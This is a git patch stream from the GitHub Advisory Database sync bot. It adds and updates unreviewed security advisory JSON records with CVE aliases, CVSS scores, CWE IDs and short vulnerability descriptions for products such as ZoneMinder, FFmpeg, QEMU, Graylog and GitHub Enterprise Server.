a/advisories/unreviewed/2026/02/GHSA-wxwg-9693-mqg4/GHSA-wxwg-9693-mqg4.json +++ b/advisories/unreviewed/2026/02/GHSA-wxwg-9693-mqg4/GHSA-wxwg-9693-mqg4.json @@ -33,7 +33,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-285" + ], "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2026/02/GHSA-xfjv-gcf8-3jqc/GHSA-xfjv-gcf8-3jqc.json b/advisories/unreviewed/2026/02/GHSA-xfjv-gcf8-3jqc/GHSA-xfjv-gcf8-3jqc.json index 3462e4bacb012..f88adbd5be477 100644 --- a/advisories/unreviewed/2026/02/GHSA-xfjv-gcf8-3jqc/GHSA-xfjv-gcf8-3jqc.json +++ b/advisories/unreviewed/2026/02/GHSA-xfjv-gcf8-3jqc/GHSA-xfjv-gcf8-3jqc.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-xfjv-gcf8-3jqc", - "modified": "2026-02-06T09:30:28Z", + "modified": "2026-02-18T18:30:23Z", "published": "2026-02-06T09:30:28Z", "aliases": [ "CVE-2026-21626" ], "details": "Access control settings for forum post custom fields are not applied to the JSON output type, leading to an ACL violation vector an information disclosure", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-xw73-fccw-fgc4/GHSA-xw73-fccw-fgc4.json b/advisories/unreviewed/2026/02/GHSA-xw73-fccw-fgc4/GHSA-xw73-fccw-fgc4.json new file mode 100644 index 0000000000000..3c8a8c96cec47 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xw73-fccw-fgc4/GHSA-xw73-fccw-fgc4.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xw73-fccw-fgc4", + "modified": "2026-02-18T18:30:39Z", + "published": "2026-02-18T18:30:39Z", + "aliases": [ + "CVE-2025-65791" + ], + "details": "ZoneMinder v1.36.34 is vulnerable to Command Injection in web/views/image.php. The application passes unsanitized user input directly to the exec() function.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-65791" + }, + { + "type": "WEB", + "url": "https://github.com/rishavand1/CVE-2025-65791" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T16:22:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xw8j-p597-rjrj/GHSA-xw8j-p597-rjrj.json b/advisories/unreviewed/2026/02/GHSA-xw8j-p597-rjrj/GHSA-xw8j-p597-rjrj.json index 767d768b5a160..ee81c183161eb 100644 --- a/advisories/unreviewed/2026/02/GHSA-xw8j-p597-rjrj/GHSA-xw8j-p597-rjrj.json +++ b/advisories/unreviewed/2026/02/GHSA-xw8j-p597-rjrj/GHSA-xw8j-p597-rjrj.json @@ -41,7 +41,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-200" + ], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, From 67ec8ed983718a3116435faf90f0d11455deef3b Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 18 Feb 2026 21:32:49 +0000 Subject: [PATCH 161/215] Advisory Database Sync --- .../GHSA-v6c5-9mp4-mwq4.json | 6 +- .../GHSA-4cjv-rrcw-xg72.json | 3 +- .../GHSA-6979-fg32-9gg4.json | 3 +- .../GHSA-7p75-39p6-7499.json | 3 +- .../GHSA-rhph-mcqr-9p2p.json | 1 + .../GHSA-27xm-cj78-cxmr.json | 2 +- .../GHSA-2g52-f4rf-8vm9.json | 40 +++++++++++++ .../GHSA-2hcf-jfqx-g286.json | 40 +++++++++++++ .../GHSA-2q3j-wj77-9934.json | 56 +++++++++++++++++ .../GHSA-3crm-x896-j73p.json | 6 +- .../GHSA-43wm-f3cq-hfrw.json | 3 +- .../GHSA-47m2-7g75-xvrp.json | 6 +- .../GHSA-49xw-73mm-8fw9.json | 6 +- .../GHSA-4pq4-6gr5-cr69.json | 40 +++++++++++++ .../GHSA-55vh-w3p8-qq9g.json | 15 +++-- .../GHSA-5hp8-hwcv-h225.json | 6 +- .../GHSA-5pqm-c33h-22jc.json | 15 +++-- .../GHSA-62j7-j842-x6r6.json | 6 +- .../GHSA-7qhw-4fcq-2g37.json | 40 +++++++++++++ .../GHSA-844q-r72x-vfmv.json | 3 +- .../GHSA-86c5-9jxx-m8g7.json | 3 +- .../GHSA-8gfj-223w-87pr.json | 40 +++++++++++++ .../GHSA-8rqj-9226-cwx7.json | 15 +++-- .../GHSA-9f49-2j27-6f79.json | 44 ++++++++++++++ .../GHSA-9hwv-m488-9fjx.json | 3 +- .../GHSA-c96q-rf2r-2xj8.json | 48 +++++++++++++++ .../GHSA-cf26-rj67-f4wr.json | 6 +- .../GHSA-cq5p-w4x6-m6h3.json | 60 +++++++++++++++++++ .../GHSA-cw7v-qx8m-563q.json | 6 +- .../GHSA-ff7j-jwgr-hgxp.json | 6 +- .../GHSA-gq25-pccv-6q8j.json | 40 +++++++++++++ .../GHSA-gwrh-w4f9-ffc9.json | 60 +++++++++++++++++++ .../GHSA-h5jq-923c-7w8g.json | 40 +++++++++++++ .../GHSA-hcrc-x9p4-f9jh.json | 4 +- .../GHSA-jx8h-vrjj-cm6g.json | 52 ++++++++++++++++ .../GHSA-m4v3-95xp-3j5h.json | 15 +++-- .../GHSA-mjjq-x58m-rfxp.json | 60 +++++++++++++++++++ .../GHSA-p546-7whm-cxpm.json | 56 +++++++++++++++++ .../GHSA-pppv-pc54-6j8r.json | 56 +++++++++++++++++ .../GHSA-qrj7-4954-7p6v.json | 44 ++++++++++++++ .../GHSA-qxf4-rqx4-9mqj.json | 1 + .../GHSA-r9wp-qq53-qvjx.json | 56 +++++++++++++++++ .../GHSA-rcjr-qg8v-4c3v.json | 40 +++++++++++++ .../GHSA-rwf8-6fj2-4vrx.json | 48 +++++++++++++++ .../GHSA-v3v9-r7ff-976x.json | 15 +++-- .../GHSA-vmr8-g4h2-2x5j.json | 52 ++++++++++++++++ .../GHSA-wjf9-j9vw-27f4.json | 40 +++++++++++++ .../GHSA-wrqv-g27w-82rr.json | 3 +- .../GHSA-xj75-gfvf-4g86.json | 42 +++++++++++++ .../GHSA-xjrj-8prq-9366.json | 3 +- .../GHSA-xqcm-jrw9-wq72.json | 14 ++++- .../GHSA-xrj7-v4x4-74hr.json | 40 +++++++++++++ 52 files changed, 1271 insertions(+), 41 deletions(-) create mode 100644 advisories/unreviewed/2026/02/GHSA-2g52-f4rf-8vm9/GHSA-2g52-f4rf-8vm9.json create mode 100644 advisories/unreviewed/2026/02/GHSA-2hcf-jfqx-g286/GHSA-2hcf-jfqx-g286.json create mode 100644 advisories/unreviewed/2026/02/GHSA-2q3j-wj77-9934/GHSA-2q3j-wj77-9934.json create mode 100644 advisories/unreviewed/2026/02/GHSA-4pq4-6gr5-cr69/GHSA-4pq4-6gr5-cr69.json create mode 100644 advisories/unreviewed/2026/02/GHSA-7qhw-4fcq-2g37/GHSA-7qhw-4fcq-2g37.json create mode 100644 advisories/unreviewed/2026/02/GHSA-8gfj-223w-87pr/GHSA-8gfj-223w-87pr.json create mode 100644 advisories/unreviewed/2026/02/GHSA-9f49-2j27-6f79/GHSA-9f49-2j27-6f79.json create mode 100644 advisories/unreviewed/2026/02/GHSA-c96q-rf2r-2xj8/GHSA-c96q-rf2r-2xj8.json create mode 100644 advisories/unreviewed/2026/02/GHSA-cq5p-w4x6-m6h3/GHSA-cq5p-w4x6-m6h3.json create mode 100644 advisories/unreviewed/2026/02/GHSA-gq25-pccv-6q8j/GHSA-gq25-pccv-6q8j.json create mode 100644 advisories/unreviewed/2026/02/GHSA-gwrh-w4f9-ffc9/GHSA-gwrh-w4f9-ffc9.json create mode 100644 advisories/unreviewed/2026/02/GHSA-h5jq-923c-7w8g/GHSA-h5jq-923c-7w8g.json create mode 100644 advisories/unreviewed/2026/02/GHSA-jx8h-vrjj-cm6g/GHSA-jx8h-vrjj-cm6g.json create mode 100644 advisories/unreviewed/2026/02/GHSA-mjjq-x58m-rfxp/GHSA-mjjq-x58m-rfxp.json create mode 100644 advisories/unreviewed/2026/02/GHSA-p546-7whm-cxpm/GHSA-p546-7whm-cxpm.json create mode 100644 advisories/unreviewed/2026/02/GHSA-pppv-pc54-6j8r/GHSA-pppv-pc54-6j8r.json create mode 100644 advisories/unreviewed/2026/02/GHSA-qrj7-4954-7p6v/GHSA-qrj7-4954-7p6v.json create mode 100644 advisories/unreviewed/2026/02/GHSA-r9wp-qq53-qvjx/GHSA-r9wp-qq53-qvjx.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rcjr-qg8v-4c3v/GHSA-rcjr-qg8v-4c3v.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rwf8-6fj2-4vrx/GHSA-rwf8-6fj2-4vrx.json create mode 100644 advisories/unreviewed/2026/02/GHSA-vmr8-g4h2-2x5j/GHSA-vmr8-g4h2-2x5j.json create mode 100644 advisories/unreviewed/2026/02/GHSA-wjf9-j9vw-27f4/GHSA-wjf9-j9vw-27f4.json create mode 100644 advisories/unreviewed/2026/02/GHSA-xj75-gfvf-4g86/GHSA-xj75-gfvf-4g86.json create mode 100644 advisories/unreviewed/2026/02/GHSA-xrj7-v4x4-74hr/GHSA-xrj7-v4x4-74hr.json diff --git a/advisories/unreviewed/2025/11/GHSA-v6c5-9mp4-mwq4/GHSA-v6c5-9mp4-mwq4.json b/advisories/unreviewed/2025/11/GHSA-v6c5-9mp4-mwq4/GHSA-v6c5-9mp4-mwq4.json index c8e47565d98ec..56a5e5890824d 100644 --- a/advisories/unreviewed/2025/11/GHSA-v6c5-9mp4-mwq4/GHSA-v6c5-9mp4-mwq4.json +++ b/advisories/unreviewed/2025/11/GHSA-v6c5-9mp4-mwq4/GHSA-v6c5-9mp4-mwq4.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-v6c5-9mp4-mwq4", - "modified": "2026-02-13T18:31:23Z", + "modified": "2026-02-18T21:31:17Z", "published": "2025-11-26T15:34:12Z", "aliases": [ "CVE-2025-13601" @@ -35,6 +35,10 @@ "type": "WEB", "url": "https://access.redhat.com/security/cve/CVE-2025-13601" }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2026:2659" + }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2026:2563" diff --git a/advisories/unreviewed/2026/01/GHSA-4cjv-rrcw-xg72/GHSA-4cjv-rrcw-xg72.json b/advisories/unreviewed/2026/01/GHSA-4cjv-rrcw-xg72/GHSA-4cjv-rrcw-xg72.json index 215280ce9c12c..75af346fff00a 100644 --- a/advisories/unreviewed/2026/01/GHSA-4cjv-rrcw-xg72/GHSA-4cjv-rrcw-xg72.json +++ b/advisories/unreviewed/2026/01/GHSA-4cjv-rrcw-xg72/GHSA-4cjv-rrcw-xg72.json @@ -26,7 +26,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-122" + "CWE-122", + "CWE-787" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/01/GHSA-6979-fg32-9gg4/GHSA-6979-fg32-9gg4.json b/advisories/unreviewed/2026/01/GHSA-6979-fg32-9gg4/GHSA-6979-fg32-9gg4.json index 0115e473402b6..9d94cb0d3493c 100644 --- a/advisories/unreviewed/2026/01/GHSA-6979-fg32-9gg4/GHSA-6979-fg32-9gg4.json +++ b/advisories/unreviewed/2026/01/GHSA-6979-fg32-9gg4/GHSA-6979-fg32-9gg4.json @@ -26,7 +26,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-121" + "CWE-121", + "CWE-787" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/01/GHSA-7p75-39p6-7499/GHSA-7p75-39p6-7499.json b/advisories/unreviewed/2026/01/GHSA-7p75-39p6-7499/GHSA-7p75-39p6-7499.json index f87321f79bee0..629cf6777cc15 100644 --- a/advisories/unreviewed/2026/01/GHSA-7p75-39p6-7499/GHSA-7p75-39p6-7499.json +++ b/advisories/unreviewed/2026/01/GHSA-7p75-39p6-7499/GHSA-7p75-39p6-7499.json @@ -26,7 +26,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-121" + "CWE-121", + "CWE-787" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/01/GHSA-rhph-mcqr-9p2p/GHSA-rhph-mcqr-9p2p.json b/advisories/unreviewed/2026/01/GHSA-rhph-mcqr-9p2p/GHSA-rhph-mcqr-9p2p.json index af5bba60417e6..751a2a7b29967 100644 --- a/advisories/unreviewed/2026/01/GHSA-rhph-mcqr-9p2p/GHSA-rhph-mcqr-9p2p.json +++ b/advisories/unreviewed/2026/01/GHSA-rhph-mcqr-9p2p/GHSA-rhph-mcqr-9p2p.json @@ -26,6 +26,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-77", "CWE-78" ], "severity": "HIGH", diff --git a/advisories/unreviewed/2026/02/GHSA-27xm-cj78-cxmr/GHSA-27xm-cj78-cxmr.json b/advisories/unreviewed/2026/02/GHSA-27xm-cj78-cxmr/GHSA-27xm-cj78-cxmr.json index b935b4bfd83c9..2284419712e9a 100644 --- a/advisories/unreviewed/2026/02/GHSA-27xm-cj78-cxmr/GHSA-27xm-cj78-cxmr.json +++ b/advisories/unreviewed/2026/02/GHSA-27xm-cj78-cxmr/GHSA-27xm-cj78-cxmr.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-27xm-cj78-cxmr", - "modified": "2026-02-17T18:32:58Z", + "modified": "2026-02-18T21:31:22Z", "published": "2026-02-17T18:32:57Z", "aliases": [ "CVE-2025-13867" diff --git a/advisories/unreviewed/2026/02/GHSA-2g52-f4rf-8vm9/GHSA-2g52-f4rf-8vm9.json b/advisories/unreviewed/2026/02/GHSA-2g52-f4rf-8vm9/GHSA-2g52-f4rf-8vm9.json new file mode 100644 index 0000000000000..1eed2d623eb85 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-2g52-f4rf-8vm9/GHSA-2g52-f4rf-8vm9.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2g52-f4rf-8vm9", + "modified": "2026-02-18T21:31:23Z", + "published": "2026-02-18T21:31:23Z", + "aliases": [ + "CVE-2025-12343" + ], + "details": "A flaw was found in FFmpeg’s TensorFlow backend within the libavfilter/dnn_backend_tf.c source file. The issue occurs in the dnn_execute_model_tf() function, where a task object is freed multiple times in certain error-handling paths. This redundant memory deallocation can lead to a double-free condition, potentially causing FFmpeg or any application using it to crash when processing TensorFlow-based DNN models. This results in a denial-of-service scenario but does not allow arbitrary code execution under normal conditions.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12343" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2025-12343" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2406533" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-415" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T21:16:20Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-2hcf-jfqx-g286/GHSA-2hcf-jfqx-g286.json b/advisories/unreviewed/2026/02/GHSA-2hcf-jfqx-g286/GHSA-2hcf-jfqx-g286.json new file mode 100644 index 0000000000000..1c2ea8ed72273 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-2hcf-jfqx-g286/GHSA-2hcf-jfqx-g286.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2hcf-jfqx-g286", + "modified": "2026-02-18T21:31:22Z", + "published": "2026-02-18T21:31:22Z", + "aliases": [ + "CVE-2025-70062" + ], + "details": "PHPGurukul Hospital Management System v4.0 contains a Cross-Site Request Forgery (CSRF) vulnerability in the 'Add Doctor' module. The application fails to enforce CSRF token validation on the add-doctor.php endpoint. This allows remote attackers to create arbitrary Doctor accounts (privileged users) by tricking an authenticated administrator into visiting a malicious page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70062" + }, + { + "type": "WEB", + "url": "https://gist.github.com/Sanka1pp/78795abd84220e879ee0425159af5ae2" + }, + { + "type": "WEB", + "url": "https://packetstorm.news/files/id/213711" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T19:21:42Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-2q3j-wj77-9934/GHSA-2q3j-wj77-9934.json b/advisories/unreviewed/2026/02/GHSA-2q3j-wj77-9934/GHSA-2q3j-wj77-9934.json new file mode 100644 index 0000000000000..adb0dfcf2a0b1 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-2q3j-wj77-9934/GHSA-2q3j-wj77-9934.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2q3j-wj77-9934", + "modified": "2026-02-18T21:31:23Z", + "published": "2026-02-18T21:31:23Z", + "aliases": [ + "CVE-2026-1355" + ], + "details": "A Missing Authorization vulnerability was identified in GitHub Enterprise Server that allowed an attacker to upload unauthorized content to another user’s repository migration export due to a missing authorization check in the repository migration upload endpoint. By supplying the migration identifier, an attacker could overwrite or replace a victim’s migration archive, potentially causing victims to download attacker-controlled repository data during migration restores or automated imports. An attacker would require authentication to the victim's GitHub Enterprise Server instance. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.20 and was fixed in versions 3.19.2, 3.18.5, 3.17.11, 3.16.14, 3.15.18, 3.14.23. This vulnerability was reported via the GitHub Bug Bounty program.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1355" + }, + { + "type": "WEB", + "url": "https://docs.github.com/en/enterprise-server@3.14/admin/release-notes#3.14.23" + }, + { + "type": "WEB", + "url": "https://docs.github.com/en/enterprise-server@3.15/admin/release-notes#3.15.18" + }, + { + "type": "WEB", + "url": "https://docs.github.com/en/enterprise-server@3.16/admin/release-notes#3.16.14" + }, + { + "type": "WEB", + "url": "https://docs.github.com/en/enterprise-server@3.17/admin/release-notes#3.17.11" + }, + { + "type": "WEB", + "url": "https://docs.github.com/en/enterprise-server@3.18/admin/release-notes#3.18.5" + }, + { + "type": "WEB", + "url": "https://docs.github.com/en/enterprise-server@3.19/admin/release-notes#3.19.2" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T21:16:23Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-3crm-x896-j73p/GHSA-3crm-x896-j73p.json b/advisories/unreviewed/2026/02/GHSA-3crm-x896-j73p/GHSA-3crm-x896-j73p.json index f16f154739d21..aa98d74bfa7bd 100644 --- a/advisories/unreviewed/2026/02/GHSA-3crm-x896-j73p/GHSA-3crm-x896-j73p.json +++ b/advisories/unreviewed/2026/02/GHSA-3crm-x896-j73p/GHSA-3crm-x896-j73p.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-3crm-x896-j73p", - "modified": "2026-02-18T15:31:26Z", + "modified": "2026-02-18T21:31:22Z", "published": "2026-02-18T15:31:26Z", "aliases": [ "CVE-2026-1435" ], "details": "Not properly invalidated session vulnerability in Graylog Web Interface, version 2.2.3, due to incorrect management of session invalidation after new logins. The application generates a new 'sessionId' each time a user authenticates, but does not invalidate previously issued session identifiers, which remain valid even after multiple consecutive logins by the same user. As a result, a stolen or leaked 'sessionId' can continue to be used to authenticate valid requests. Exploiting this vulnerability would allow an attacker with access to the web service/API network (port 9000 or HTTP/S endpoint of the server) to reuse an old session token to gain unauthorized access to the application, interact with the API/web, and compromise the integrity of the affected account.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-43wm-f3cq-hfrw/GHSA-43wm-f3cq-hfrw.json b/advisories/unreviewed/2026/02/GHSA-43wm-f3cq-hfrw/GHSA-43wm-f3cq-hfrw.json index a1d78ed65635d..3794a50329c10 100644 --- a/advisories/unreviewed/2026/02/GHSA-43wm-f3cq-hfrw/GHSA-43wm-f3cq-hfrw.json +++ b/advisories/unreviewed/2026/02/GHSA-43wm-f3cq-hfrw/GHSA-43wm-f3cq-hfrw.json @@ -42,7 +42,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-74" + "CWE-74", + "CWE-77" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-47m2-7g75-xvrp/GHSA-47m2-7g75-xvrp.json b/advisories/unreviewed/2026/02/GHSA-47m2-7g75-xvrp/GHSA-47m2-7g75-xvrp.json index 92410cc1fc832..67d9d020fc092 100644 --- a/advisories/unreviewed/2026/02/GHSA-47m2-7g75-xvrp/GHSA-47m2-7g75-xvrp.json +++ b/advisories/unreviewed/2026/02/GHSA-47m2-7g75-xvrp/GHSA-47m2-7g75-xvrp.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-47m2-7g75-xvrp", - "modified": "2026-02-18T15:31:26Z", + "modified": "2026-02-18T21:31:22Z", "published": "2026-02-18T15:31:26Z", "aliases": [ "CVE-2026-1440" ], "details": "Reflected Cross-Site Scripting (XSS) vulnerability in the Graylog Web Interface console, version 2.2.3, caused by a lack of proper sanitization and escaping in HTML output. Several endpoints include segments of the URL directly in the response without applying output encoding, allowing an attacker to inject and execute arbitrary JavaScript code when a user visits a specially crafted URL. Exploitation of this vulnerability may allow script execution in the victim's browser and limited manipulation of the affected user's session context, through the  '/system/pipelines/' endpoint.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-49xw-73mm-8fw9/GHSA-49xw-73mm-8fw9.json b/advisories/unreviewed/2026/02/GHSA-49xw-73mm-8fw9/GHSA-49xw-73mm-8fw9.json index 3e7b6867826cb..14b4651484351 100644 --- a/advisories/unreviewed/2026/02/GHSA-49xw-73mm-8fw9/GHSA-49xw-73mm-8fw9.json +++ b/advisories/unreviewed/2026/02/GHSA-49xw-73mm-8fw9/GHSA-49xw-73mm-8fw9.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-49xw-73mm-8fw9", - "modified": "2026-02-18T15:31:26Z", + "modified": "2026-02-18T21:31:22Z", "published": "2026-02-18T15:31:26Z", "aliases": [ "CVE-2026-1439" ], "details": "Reflected Cross-Site Scripting (XSS) vulnerability in the Graylog Web Interface console, version 2.2.3, caused by a lack of proper sanitization and escaping in HTML output. Several endpoints include segments of the URL directly in the response without applying output encoding, allowing an attacker to inject and execute arbitrary JavaScript code when a user visits a specially crafted URL. Exploitation of this vulnerability may allow script execution in the victim's browser and limited manipulation of the affected user's session context, through the  '/\n\nalerts\n\n/' endpoint.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-4pq4-6gr5-cr69/GHSA-4pq4-6gr5-cr69.json b/advisories/unreviewed/2026/02/GHSA-4pq4-6gr5-cr69/GHSA-4pq4-6gr5-cr69.json new file mode 100644 index 0000000000000..a1b59ad0595c4 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-4pq4-6gr5-cr69/GHSA-4pq4-6gr5-cr69.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4pq4-6gr5-cr69", + "modified": "2026-02-18T21:31:23Z", + "published": "2026-02-18T21:31:23Z", + "aliases": [ + "CVE-2026-0665" + ], + "details": "An off-by-one error was found in QEMU's KVM Xen guest support. A malicious guest could use this flaw to trigger out-of-bounds heap accesses in the QEMU process via the emulated Xen physdev hypercall interface, leading to a denial of service or potential memory corruption.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0665" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2026-0665" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2428640" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-787" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T21:16:22Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-55vh-w3p8-qq9g/GHSA-55vh-w3p8-qq9g.json b/advisories/unreviewed/2026/02/GHSA-55vh-w3p8-qq9g/GHSA-55vh-w3p8-qq9g.json index 5f43ff3dcbfb9..da562ffae87ff 100644 --- a/advisories/unreviewed/2026/02/GHSA-55vh-w3p8-qq9g/GHSA-55vh-w3p8-qq9g.json +++ b/advisories/unreviewed/2026/02/GHSA-55vh-w3p8-qq9g/GHSA-55vh-w3p8-qq9g.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-55vh-w3p8-qq9g", - "modified": "2026-02-18T18:30:40Z", + "modified": "2026-02-18T21:31:22Z", "published": "2026-02-18T18:30:40Z", "aliases": [ "CVE-2025-70141" ], "details": "SourceCodester Customer Support System 1.0 contains an incorrect access control vulnerability in ajax.php. The AJAX dispatcher does not enforce authentication or authorization before invoking administrative methods in admin_class.php based on the action parameter. An unauthenticated remote attacker can perform sensitive operations such as creating customers and deleting users (including the admin account), as well as modifying or deleting other application records (tickets, departments, comments), resulting in unauthorized data modification.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-306" + ], + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-18T17:21:35Z" diff --git a/advisories/unreviewed/2026/02/GHSA-5hp8-hwcv-h225/GHSA-5hp8-hwcv-h225.json b/advisories/unreviewed/2026/02/GHSA-5hp8-hwcv-h225/GHSA-5hp8-hwcv-h225.json index 57e5554fcf326..b3abdac0e1d53 100644 --- a/advisories/unreviewed/2026/02/GHSA-5hp8-hwcv-h225/GHSA-5hp8-hwcv-h225.json +++ b/advisories/unreviewed/2026/02/GHSA-5hp8-hwcv-h225/GHSA-5hp8-hwcv-h225.json 